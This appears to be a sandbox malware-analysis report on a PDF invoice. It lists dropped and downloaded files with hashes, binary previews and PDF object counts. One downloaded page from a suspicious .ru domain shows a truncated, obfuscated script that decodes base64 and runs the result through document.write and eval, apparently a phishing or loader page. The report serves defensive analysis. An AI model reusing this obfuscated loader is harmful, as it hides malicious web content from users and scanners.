                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                          Category:dropped
                          Size (bytes):758601
                          Entropy (8bit):7.98639316555857
                          Encrypted:false
                          SSDEEP:
                          MD5:59EE5E2FB56A099CAA8EDFD7AF821ED6
                          SHA1:F5DC4F876768D57B69EC894ADE0A66E813BFED92
                          SHA-256:E100AAAA4FB2B3D78E3B6475C3B48BE189C5A39F73CFC2D22423F2CE928D3E75
                          SHA-512:77A45C89F6019F92576D88AE67B59F9D6D36BA6FDC020419DAB55DBD8492BA97B3DAC18278EB0210F90758B3D643EA8DCF8EC2BD1481930A59B8BB515E7440FE
                          Malicious:false
                          Reputation:unknown
                          Preview:...........].s..R/c..D@..\......3Z.....E.,...d{.k.~..H3....-......A...<>n.......X..Dp..d......f.{...9&F..........R.UW-..^..zC.kjOUUMm...nW...Z.7.J.R.....=*.R........4..(WCMQ..u]]R...R......5.*..N)].....!.-.d]M....7.......i..rmP...6A.Z .=..~..$C-..}..Mo.T......:._'.S....r.9....6.....r....#...<U@.Iiu..X].T x.j....x...:q.....j]P3......[.5]|..7;.5....^..7(.E..@..s...2..}..j....*...t.5J...6Rf..%P{2T^$Y.V.O9.W...4...\ .5............Q.&j....h.+.u......W...4f]..s..(...:....`.<W_...z*Bs|tF5 NI4.zD..5...u...!........M.0.K%F....,.c.....>R6..i..Am.y.~5..S....M...^......F.&..V...Z.......i....b....V..,.UH"...W...5}A.....KUT..=6jZ.....B...Z...Y(..u...=....x,2..."._Cf.....b...z7..... r..#.r..L9....2...R,..J?&..p..~.....3.=z...w..m..U..%._#<....r.....B.z..G..D.:4m.Z.&.N......</..Dz+.......vn.....;Qhk....!dw...A......3..a..K...).Q.`t[..)].6.%@....v.g.%E>;Z...uz.L..6Ct..O.Eo.O.e..........J.J$...:....K..)......F.....ZWE...z..5..g.io...l2[.,m9X..f......5|:bj[.._R{gi...^
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                          Category:dropped
                          Size (bytes):386528
                          Entropy (8bit):7.9736851559892425
                          Encrypted:false
                          SSDEEP:
                          MD5:5C48B0AD2FEF800949466AE872E1F1E2
                          SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                          SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                          SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                          Malicious:false
                          Reputation:unknown
                          Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (65447)
                          Category:downloaded
                          Size (bytes):89501
                          Entropy (8bit):5.289893677458563
                          Encrypted:false
                          SSDEEP:
                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                          Malicious:false
                          Reputation:unknown
                          URL:https://code.jquery.com/jquery-3.6.0.min.js
                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:HTML document, ASCII text, with very long lines (65360)
                          Category:downloaded
                          Size (bytes):912027
                          Entropy (8bit):3.111999441119187
                          Encrypted:false
                          SSDEEP:
                          MD5:B8ACBA3A765A501040D39D092AA1F493
                          SHA1:6F232CC7EC0C4ED02B9B15E4C1B726225845C5E8
                          SHA-256:4A3C37097A43EDC1710B51724948B02AB90F2346AC0F1303ED563453843489C5
                          SHA-512:929451330486B8D8ED43E31445C9D1EC7A9A020C823AB77CD62292C5935857F436E4329F7F16129F18A577BE3C7E007685F72995A4EFB32E710573C09F5C5834
                          Malicious:false
                          Reputation:unknown
                          URL:https://qs1ywa.vsmaemhjvk.ru/vHFigT/
                          Preview:<script>.wmTVgTGoyl = atob("aHR0cHM6Ly91WjVrLnZzbWFlbWhqdmsucnUvdkhGaWdULw==");.bSXMlUKzpD = atob("bm9tYXRjaA==");.EnTCqGdlJo = atob("d3JpdGU=");.if(wmTVgTGoyl == bSXMlUKzpD){.document[EnTCqGdlJo](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9RWRnZSxjaHJvbWU9MSI+CiAgICA8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vaW5kZXgsIG5vZm9sbG93Ij4KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4KICAgIDx0aXRsZT4mIzgyMDM7PC90aXRsZT4KICAgIDxzY3JpcHQ+CiAgICBjb25zdCBGQnV1eldZc1VBID0gewogIGdldChqaHBIZGZtaXFELCBPTmlTWW5RZUdEKSB7CiAgICBjb25zdCBmTHNGTXFxdWRjID0gWy4uLk9OaVNZblFlR0RdCiAgICAgIC5tYXAoQXVubFhBemNHaiA9PiArKCfvvqAnID4gQXVubFhBemNHaikpCiAgICAgIC5qb2luKCcnKTsKICAgIGNvbnN0IFJWY0FxRkhEa3EgPSBmTHNGTXFxdWRjLnJlcGxhY2UoLy57OH0vZywgbHFLQlJPZ3R1dyA9PgogICAgICBTdHJpbmcuZnJvbUNoYXJDb2RlKHBhcnNlSW50KGxxS0JST2d0dXcsIDIpKQogICAgKTsKICAgIHJldHVybiBldmFsKFJWY0FxRkhEa3EpOwo
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with no line terminators
                          Category:downloaded
                          Size (bytes):16
                          Entropy (8bit):3.5
                          Encrypted:false
                          SSDEEP:
                          MD5:F1C9C44E663E7E62582E3F5B236C1C72
                          SHA1:E142F3A0C2D1CDF175A5C3AF43AD66FEFE208B1F
                          SHA-256:D843E67FBFA1F5CB0024062861EE26860C5A866F80755CF39B3465459A8538B9
                          SHA-512:19FE62CB9D884BB3424C51DD15E74EB22E5A639BABF8398BACEBB781862296FA0D7AEE39C88CB9C7AF5791FD58830AC3433F5C6BD94B1BA3912AB33151E93452
                          Malicious:false
                          Reputation:unknown
                          URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCRuID-IvZ2TSEgUNNzCpMCGT6uex6izNtA==?alt=proto
                          Preview:CgkKBw03MKkwGgA=
                          File type:PDF document, version 1.6
                          Entropy (8bit):7.930185340136312
                          TrID:
                          • Adobe Portable Document Format (5005/1) 100.00%
                          File name:Invoice1-1706517.pdf
                          File size:52'890 bytes
                          MD5:5af5ee83faae160ffab3cd5c8cd28117
                          SHA1:40c1f5fa7e36d118aaf8b467f455eb1c6189eaf6
                          SHA256:53924aaf790a371a77f5fe5bc1c85ed924e4c26762eea55911845744692274a8
                          SHA512:b3ccb22463c36126ac9ba60596bba193c5adf917b4712bbb37cdf47602aedbe2e76029f3fd595a4ef2469bb39f50420cc2545bbda1ccdf0a662047385a602972
                          SSDEEP:1536:oaZC54j2Aup+lgekiqCAltX3/MCgPnTn9dz:HZCSaAusSi+XvjETn9dz
                          TLSH:973302ACA854DC8CDDE469B6204043CE42DF6C3B9FD617322ECBA3419E8930AB5D4DA4
                          File Content Preview:%PDF-1.6.%.....2 0 obj.<<./Lang <FEFF0045004E002D00550053>./MarkInfo 4 0 R./Metadata 5 0 R./PageLayout /OneColumn./Pages 6 0 R./StructTreeRoot 7 0 R./Type /Catalog./AcroForm 8 0 R.>>.endobj.5 0 obj.<<./Subtype /XML./Type /Metadata./Filter /FlateDecode./Le
                          Icon Hash:62cc8caeb29e8ae0

                          General

                          Header:%PDF-1.6
                          Total Entropy:7.930185
                          Total Bytes:52890
                          Stream Entropy:7.929924
                          Stream Bytes:51800
                          Entropy outside Streams:5.203096
                          Bytes outside Streams:1090
                          Number of EOF found:1
                          Bytes after EOF:
                          NameCount
                          obj9
                          endobj9
                          stream7
                          endstream7
                          xref0
                          trailer0
                          startxref1
                          /Page0
                          /Encrypt0
                          /ObjStm1
                          /URI0
                          /JS0
                          /JavaScript0
                          /AA0
                          /OpenAction0
                          /AcroForm1
                          /JBIG2Decode0
                          /RichMedia0
                          /Launch0
                          /EmbeddedFile0
                          IDDHASHMD5Preview
                          3211313038394f373699a66323ff5e1bcbb778db6bfb3b60cf